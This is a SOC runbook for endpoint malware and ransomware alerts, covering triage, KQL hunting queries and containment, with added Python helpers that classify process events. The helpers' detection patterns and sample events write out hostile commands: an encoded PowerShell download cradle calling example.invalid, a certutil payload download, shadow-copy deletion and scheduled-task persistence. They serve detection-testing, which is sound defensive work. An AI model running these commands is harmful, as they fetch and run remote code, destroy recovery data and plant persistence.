Runbook: Endpoint Malicious Behavior¶
Runbook Metadata¶
| Field | Value |
|---|---|
| Runbook ID | RB-002 |
| Title | Endpoint Malicious Behavior — Malware / Ransomware / Suspicious Process |
| Version | 1.2 |
| Status | Approved |
| Owner | SOC Tier 2 |
| MITRE ATT&CK | TA0002 (Execution), TA0003 (Persistence), TA0005 (Defense Evasion), TA0040 (Impact) |
| Alert Sources | EDR malware detection, suspicious process execution, ransomware behavior detection, LOLBin abuse |
| Nexus SecOps Controls | Nexus SecOps-031, Nexus SecOps-070, Nexus SecOps-139, Nexus SecOps-140, Nexus SecOps-142 |
| SLA | Critical (ransomware): 5min acknowledgment; High: 15min |
Overview¶
What triggers this runbook: EDR/AV detection of malware, suspicious process execution (PowerShell with encoded commands, LOLBins used offensively), ransomware file encryption behavior, process injection detected, or persistence mechanism creation.
Why this matters: Malware on an endpoint is a potential beachhead for ransomware deployment, data exfiltration, lateral movement, and persistent access. Speed of response is critical — ransomware can encrypt a file server in under 30 minutes from initial execution.
Common causes:
| Cause | TP or FP | Frequency |
|---|---|---|
| Actual malware execution | TP | Low-Medium |
| Penetration test (authorized) | FP | Low |
| Legitimate admin tool (PsExec, WMIC) | FP | Medium |
| Software update process using PowerShell | FP | High |
| False positive from AV/EDR signature | FP | Medium |
| Ransomware encryption behavior | TP | Very Low — CRITICAL if TP |
Triage Steps (Tier 1) — Target: 5 minutes for ransomware; 15 minutes for others¶
If the alert indicates active ransomware file encryption, SKIP to Step 4 immediately.
Step 1: Alert Classification¶
- [ ] 1.1 Identify the alert type:
- ☐ Ransomware behavior (file mass encryption, shadow copy deletion)
- ☐ Known malware family (identified by AV signature)
- ☐ Suspicious PowerShell / script execution
- ☐ LOLBin abuse (certutil, regsvr32, mshta, etc.)
- ☐ Persistence mechanism (registry run key, scheduled task, service)
- ☐ Process injection (into legitimate process)
- [ ] 1.2 Identify the affected host: ______
- Business criticality: ☐ Critical ☐ High ☐ Standard
- User on the host right now: ______
- Host type: ☐ Workstation ☐ Server ☐ Domain Controller ☐ Cloud VM
Step 2: EDR Console Check¶
Access the EDR console for the affected host immediately:
- [ ] 2.1 Confirm the alert is not a known exception or authorized tool
- [ ] 2.2 Review the process tree: What spawned the suspicious process?
- Parent process: ______
- Child processes: ______
- Command line: ______
- [ ] 2.3 Check: Is the malware process still running? ☐ Yes (active) ☐ No (terminated)
- [ ] 2.4 Check: Has the EDR auto-quarantined the file? ☐ Yes ☐ No
- [ ] 2.5 Identify file path and hash of suspicious executable: ______
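The following is an added triage helper, not part of the runbook or any EDR vendor's rule set. It maps a single process event (file name plus command line, as recorded in Step 2.2) onto the Step 1.1 categories, decodes a PowerShell `-EncodedCommand` payload so Tier 1 can read what actually ran, and flags the mass-rename pattern that Step 4 treats as active encryption. The indicator patterns, thresholds, and every sample event are this example's own assumptions and constructed data.

```python
"""Added triage helper (not runbook code): classify one EDR process event into
the Step 1.1 categories, decode -EncodedCommand, and detect mass renames.
All patterns are this example's assumptions; all sample events are constructed."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SHADOW_COPY_PATTERNS = [  # recovery tampering that precedes encryption
    r"vssadmin(\.exe)?\s+delete\s+shadows",
    r"wmic(\.exe)?\s+shadowcopy\s+delete",
    r"bcdedit(\.exe)?\b.*recoveryenabled\s+no",
    r"wbadmin(\.exe)?\s+delete\s+catalog",
]
# LOLBin name -> argument pattern that separates abuse from routine admin use.
LOLBIN_ABUSE = {
    "certutil.exe": r"-urlcache|-decode|-encode",
    "regsvr32.exe": r"/i:|scrobj\.dll",
    "mshta.exe": r"https?:|javascript:|vbscript:",
    "rundll32.exe": r"javascript:|url\.dll",
}
PERSISTENCE_PATTERNS = [
    r"schtasks(\.exe)?\s+/create",
    r"reg(\.exe)?\s+add\s+.*\\currentversion\\run",
    r"sc(\.exe)?\s+create\s+",
]
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand; -ep must not match.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Verdict:
    category: str
    reason: str
    decoded: Optional[str] = None


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: still suspicious, just not decodable


def classify(file_name: str, cmdline: str) -> Verdict:
    """Map one process event to a Step 1.1 category; the worst match wins."""
    name, cl = file_name.lower(), cmdline.lower()
    for p in SHADOW_COPY_PATTERNS:
        if re.search(p, cl):
            return Verdict("Ransomware behavior", f"recovery tampering: {p}")
    if name in ("powershell.exe", "pwsh.exe"):
        if ENCODED_FLAG.search(cmdline):
            return Verdict("Suspicious PowerShell / script execution",
                           "encoded command", decode_encoded_command(cmdline))
        if re.search(r"downloadstring|downloadfile|invoke-webrequest|\biex\b", cl):
            return Verdict("Suspicious PowerShell / script execution", "download cradle")
    if name in LOLBIN_ABUSE and re.search(LOLBIN_ABUSE[name], cl):
        return Verdict("LOLBin abuse", f"{name} with offensive arguments")
    for p in PERSISTENCE_PATTERNS:
        if re.search(p, cl):
            return Verdict("Persistence mechanism", p)
    return Verdict("Unclassified", "no runbook pattern matched; review process tree")


def is_mass_rename(events: List[Tuple[float, str, str]],
                   threshold: int = 100, window_s: float = 60.0) -> bool:
    """True if >= threshold extension-changing renames fall within window_s.

    events: (unix_time, old_path, new_path). Renames that keep the extension
    (editor temp-file swaps) are ignored so a busy user stays under threshold.
    """
    ts = sorted(t for t, old, new in events
                if old.rsplit(".", 1)[-1].lower() != new.rsplit(".", 1)[-1].lower())
    lo = 0
    for hi in range(len(ts)):
        while ts[hi] - ts[lo] > window_s:
            lo += 1
        if hi - lo + 1 >= threshold:
            return True
    return False


# Constructed sample events (not real telemetry).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ("powershell.exe", f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    ("vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ("certutil.exe", "certutil.exe -urlcache -split -f http://example.invalid/p.bin C:\\Users\\Public\\p.bin"),
    ("schtasks.exe", "schtasks.exe /create /sc onlogon /tn Updater /tr C:\\Users\\Public\\p.bin"),
    ("svchost.exe", "svchost.exe -k netsvcs -p"),
]
# 150 renames to .locked inside 15 seconds versus 5 renames spread over an hour.
RANSOM_RENAMES = [(i * 0.1, f"D:\\share\\doc{i}.docx", f"D:\\share\\doc{i}.docx.locked") for i in range(150)]
BENIGN_RENAMES = [(i * 900.0, f"C:\\work\\f{i}.tmp", f"C:\\work\\f{i}.xlsx") for i in range(5)]

if __name__ == "__main__":
    for fname, cl in SAMPLE_EVENTS:
        v = classify(fname, cl)
        print(f"{v.category:40} {v.reason}" + (f"\n    decoded: {v.decoded}" if v.decoded else ""))
    print("mass rename, ransom sample:", is_mass_rename(RANSOM_RENAMES))
    print("mass rename, benign sample:", is_mass_rename(BENIGN_RENAMES))
```

The category order is deliberate: shadow-copy deletion is checked before anything else because it is the one signal that should send the analyst straight to Step 4, and a LOLBin only counts as abuse when its arguments match, which keeps the high-frequency software-update false positives from the causes table out of the LOLBin bucket.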
Step 3: Rapid Threat Intelligence Check¶
- [ ] 3.1 Search the file hash in TIP / VirusTotal (via integration)
- [ ] 3.2 Search any external IPs the process connected to
- [ ] 3.3 Identify malware family if known: ______
- [ ] 3.4 Are there any CISA/vendor advisories for this family?
Step 4: Ransomware Emergency Protocol¶
RANSOMWARE SUSPECTED — EXECUTE IMMEDIATELY, NOTIFY IN PARALLEL
If the alert shows mass file encryption, shadow copy deletion, or known ransomware behavior:
- Immediately notify: On-call T2 lead + Manager + (if after-hours) incident response phone tree
- Initiate host isolation via EDR console (do NOT wait for approval — time-critical)
- Alert file server team: Check if any file servers were recently accessed from this host
- Disable the affected user account (attacker may have credentials)
- Preserve memory: trigger an EDR memory capture as soon as the host is isolated. EDR network isolation normally keeps the agent's management channel open, so the capture does not depend on delaying isolation; never hold off isolating an actively encrypting host to collect memory first.
Ransomware playbook trigger: Notify all parties and escalate to Incident Commander.
Investigation Steps (Tier 2)¶
Step 5: Initial Access Investigation¶
Determine how the malware arrived on the host:
```kql
// EDR process tree: script interpreters in the 4 hours before the alert
// {ALERT_TIME} is the alert timestamp from Step 1; anchoring on it rather than
// now() keeps the window stable when the investigation starts hours later.
let alertTime = datetime({ALERT_TIME});
DeviceProcessEvents
| where DeviceName == "{HOST}"
| where Timestamp between ((alertTime - 4h) .. alertTime)
| where ProcessCommandLine has_any ("powershell", "cmd", "wscript", "cscript", "mshta")
| project Timestamp, FileName, ProcessId, ProcessCommandLine,
    InitiatingProcessFileName, InitiatingProcessId, InitiatingProcessCommandLine
| order by Timestamp asc
```

```kql
// Email delivery before malware execution (phishing pivot)
// A maldoc that passed filtering carries no ThreatTypes, so attachments are included.
let alertTime = datetime({ALERT_TIME});
EmailEvents
| where RecipientEmailAddress =~ "{USER_EMAIL}"
| where Timestamp between ((alertTime - 24h) .. alertTime)
| where ThreatTypes has_any ("Phish", "Malware") or AttachmentCount > 0
| project Timestamp, Subject, SenderFromAddress, ThreatTypes, DeliveryAction, AttachmentCount
| order by Timestamp asc
```
- [ ] 5.1 Identify patient zero process (first malicious event in chain)
- [ ] 5.2 Identify initial access vector (phishing, exploit, drive-by, lateral movement from another host)
- [ ] 5.3 Has this malware spread? Check network connections for SMB/RDP lateral movement
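An added example for Steps 5.1, 5.2 and 6.5, not part of the runbook: given process events exported from the EDR (the columns the query above projects), it rebuilds the ancestry of the alerting process, picks the patient-zero event, infers the initial access vector from the nearest launcher in the chain, and computes dwell time. The vector table, the patient-zero heuristic, and all events are this example's assumptions and constructed data; it keys on the OS pid, which real exports should replace with the EDR's unique process identifier because pids are reused.

```python
"""Added example for Step 5 (not runbook code): process ancestry, patient zero,
initial access vector and dwell time from exported EDR process events.
Events and the vector table are constructed assumptions of this example."""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    timestamp: datetime
    pid: int
    ppid: int
    file_name: str
    cmdline: str


# Nearest ancestor in this table names the vector (assumption mirroring Step 5.2).
VECTOR_BY_LAUNCHER = {
    "outlook.exe": "phishing (attachment or link opened from mail client)",
    "winword.exe": "phishing (malicious document)",
    "excel.exe": "phishing (malicious document)",
    "chrome.exe": "drive-by or user download",
    "msedge.exe": "drive-by or user download",
    "psexesvc.exe": "lateral movement (PsExec from another host)",
    "wmiprvse.exe": "lateral movement (WMI remote execution)",
    "wsmprovhost.exe": "lateral movement (WinRM)",
    "explorer.exe": "user-executed file",
}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
MACRO_DOC = re.compile(r"\.(docm|xlsm|js|vbs|hta)\b", re.I)


def ancestry(events: List[ProcEvent], alert_pid: int) -> List[ProcEvent]:
    """Walk parent links from alert_pid to the root; returns root-first order.

    Assumes pid is unique in the export window. The visited set stops a walk
    that pid reuse has turned into a cycle instead of looping forever.
    """
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    chain, seen, pid = [], set(), alert_pid
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    chain.reverse()
    return chain


def patient_zero(chain: List[ProcEvent]) -> Optional[ProcEvent]:
    """Root-most event that first runs attacker-controlled content: an Office
    process opening a macro document, or the first script interpreter."""
    for e in chain:
        if e.file_name.lower() in INTERPRETERS or MACRO_DOC.search(e.cmdline):
            return e
    return None


def initial_access_vector(chain: List[ProcEvent]) -> str:
    """Vector named by the launcher closest to the alerting process."""
    for e in reversed(chain):
        v = VECTOR_BY_LAUNCHER.get(e.file_name.lower())
        if v:
            return v
    return "unknown (no recognised launcher in chain)"


def triage_summary(events: List[ProcEvent], alert_pid: int, alert_time: datetime) -> dict:
    chain = ancestry(events, alert_pid)
    pz = patient_zero(chain)
    start = pz.timestamp if pz else (chain[0].timestamp if chain else alert_time)
    return {
        "chain": [e.file_name for e in chain],
        "patient_zero": pz.file_name if pz else None,
        "vector": initial_access_vector(chain),
        "dwell_minutes": (alert_time - start).total_seconds() / 60,
    }


# Constructed sample export: explorer -> outlook -> winword(invoice.docm) -> cmd -> powershell -> rundll32
T = lambda h, m, s=0: datetime(2025, 11, 3, h, m, s)
SAMPLE_EVENTS = [
    ProcEvent(T(8, 40), 900, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(T(8, 41), 1200, 900, "outlook.exe", '"OUTLOOK.EXE"'),
    ProcEvent(T(8, 50), 700, 600, "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(T(9, 2), 3100, 1200, "WINWORD.EXE", '"WINWORD.EXE" /n "C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice.docm"'),
    ProcEvent(T(9, 2, 30), 4400, 3100, "cmd.exe", "cmd.exe /c powershell -nop -w hidden -enc AAAA"),
    ProcEvent(T(9, 2, 31), 5100, 4400, "powershell.exe", "powershell -nop -w hidden -enc AAAA"),
    ProcEvent(T(9, 5), 6200, 5100, "rundll32.exe", "rundll32.exe C:\\Users\\Public\\p.dll,Start"),
]
ALERT_TIME = T(9, 12)
# Two events whose pids point at each other, as pid reuse can produce.
CYCLE_EVENTS = [ProcEvent(T(9, 0), 10, 11, "a.exe", "a"), ProcEvent(T(9, 1), 11, 10, "b.exe", "b")]

if __name__ == "__main__":
    for k, v in triage_summary(SAMPLE_EVENTS, 6200, ALERT_TIME).items():
        print(f"{k:14} {v}")
```

Dwell time is measured from the patient-zero event rather than the alert, which is what Step 6.5 asks for; the gap between the two is the window in which lateral movement (Step 5.3) needs to be checked.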
Step 6: Scope Assessment¶
```kql
// Outbound connections from the affected host to SMB / RDP / WinRM ports,
// from 2 hours before the alert to now (spread may continue after the alert)
let alertTime = datetime({ALERT_TIME});
DeviceNetworkEvents
| where DeviceName == "{HOST}"
| where Timestamp between ((alertTime - 2h) .. now())
| where RemotePort in (445, 139, 3389, 5985, 5986)
| where ActionType in ("ConnectionSuccess", "ConnectionRequest")
| summarize targets = make_set(RemoteIP), first_seen = min(Timestamp), last_seen = max(Timestamp) by RemotePort
```
- [ ] 6.1 List hosts this host connected to (potential spread targets): ______
- [ ] 6.2 Has any file server been accessed? ☐ Yes ☐ No
- [ ] 6.3 Is any sensitive data at risk? ☐ Yes ☐ No
- [ ] 6.4 Any signs of data staging for exfiltration (large archive files, cloud upload)?
- [ ] 6.5 Estimated dwell time (first suspicious event): ______
Containment Actions¶
Option A: Host Isolation (Primary)¶
When to use: Active malware, ransomware, C2 communication, active spread
- [ ] Isolation timestamp: ____ UTC
- [ ] Approved by: ______
- [ ] Business impact of isolation: ______
A domain controller or file server isolation will have major business impact. Escalate and notify business owner before isolating these hosts.
Option B: Targeted Process Kill¶
When to use: Malware process identified, no evidence of persistence or spread to other hosts, low-impact host. Re-check the process tree after the kill; a persistence mechanism from Step 1.1 will simply restart it.
Option C: User Account Containment¶
When to use: Evidence that attacker is using the user's credentials for lateral movement
- Revoke active sessions
- Reset password (coordinate with user/helpdesk)
- Review and revoke suspicious MFA registrations
Evidence Collection¶
Collect in this order (volatility order — most volatile first):
- [ ] Memory dump — via EDR or forensic tool (immediately after EDR isolation, which normally keeps the agent channel open; do not delay isolation for it)
- [ ] Running process list — EDR snapshot
- [ ] Network connections — active connections snapshot
- [ ] EDR telemetry export — full 72h telemetry for the host
- [ ] Disk image — for legal proceedings or deep forensics
Storage location: [Define per org evidence policy]
Chain of custody initiated: ☐ Yes ☐ No
Communication Templates¶
Tier 1 to Tier 2 Escalation (non-ransomware):
Escalating endpoint malware alert on {HOST} ({USER}).
Alert: {ALERT_NAME} at {TIME} UTC
Process: {PROCESS} spawned by {PARENT}
Hash: {HASH} — [VirusTotal: X/XX engines]
Active/Terminated: {STATUS}
EDR quarantined: {YES/NO}
Recommendation: {ASSESS / DECLARE INCIDENT}
Ransomware all-hands notification:
CRITICAL INCIDENT — Ransomware detected
Host: {HOST}
Time: {TIME} UTC
Malware: {FAMILY if known}
Status: Host {ISOLATED/NOT YET ISOLATED}
File server access: {YES/NO}
ACTION REQUIRED:
- Incident Commander: Respond to this bridge
- IT: Check backup status for {FILE SERVERS}
- Network: Review traffic from {HOST SUBNET}
- Management: Stand by for update in 15 minutes
References¶
- T1486 — Data Encrypted for Impact (Ransomware)
- T1059 — Command and Scripting Interpreter
- CISA Ransomware Guide
- No More Ransom Project
- Related: RB-004 — Data Exfiltration
RB-002 v1.2 | Reviewed: 2025-Q4 | Next review: 2026-Q4